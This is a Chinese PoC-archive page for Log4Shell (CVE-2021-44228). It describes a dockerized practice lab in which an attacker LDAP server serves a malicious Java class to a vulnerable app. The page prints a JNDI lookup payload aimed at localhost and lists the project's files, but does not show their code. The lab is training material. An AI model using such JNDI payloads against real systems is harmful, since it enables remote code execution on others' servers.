POC详情: d608eea28c8e6d1408c99e0cc083f73569c5a726

来源
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
介绍
# CVE-2021-44228 (Log4Shell) Vulnerability Lab Environment

## Introduction
This project provides a dockerized environment for safely practicing and understanding the critical Log4j vulnerability known as CVE-2021-44228 (Log4Shell).

## Key Features
- Secure dockerized testing environment
- Custom payload testing capability
- Includes attacker's LDAP server and vulnerable Java application

## Getting Started
```bash
docker compose up --build
```

## Payload Testing
1. You can modify the payload in the test section of `/vulnerable/Makefile`
2. The default payload uses `$${jndi:ldap://127.0.0.1:10000/}`

## How It Works
1. The vulnerable Java application starts
2. The attacker's LDAP server listens on port 10000
3. The vulnerable application runs
4. The Log4Shell payload is logged in the vulnerable application through the Makefile test section
5. The vulnerable application attempts a JNDI LDAP lookup
6. The LDAP server returns a malicious Java class
7. The vulnerable application loads and executes this class
文件快照

[4.0K] /data/pocs/d608eea28c8e6d1408c99e0cc083f73569c5a726 ├── [4.0K] attacker │   ├── [ 311] http-server.js │   ├── [ 300] index.js │   ├── [ 506] ldap-server.js │   ├── [ 88] Makefile │   ├── [ 51] package.json │   ├── [8.8K] package-lock.json │   └── [ 333] Payload.java ├── [ 168] docker-compose.yml ├── [ 253] Dockerfile ├── [ 221] Makefile ├── [1021] README.md └── [4.0K] vulnerable ├── [ 439] log4j2.xml ├── [ 236] Main.java └── [ 396] Makefile 2 directories, 14 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。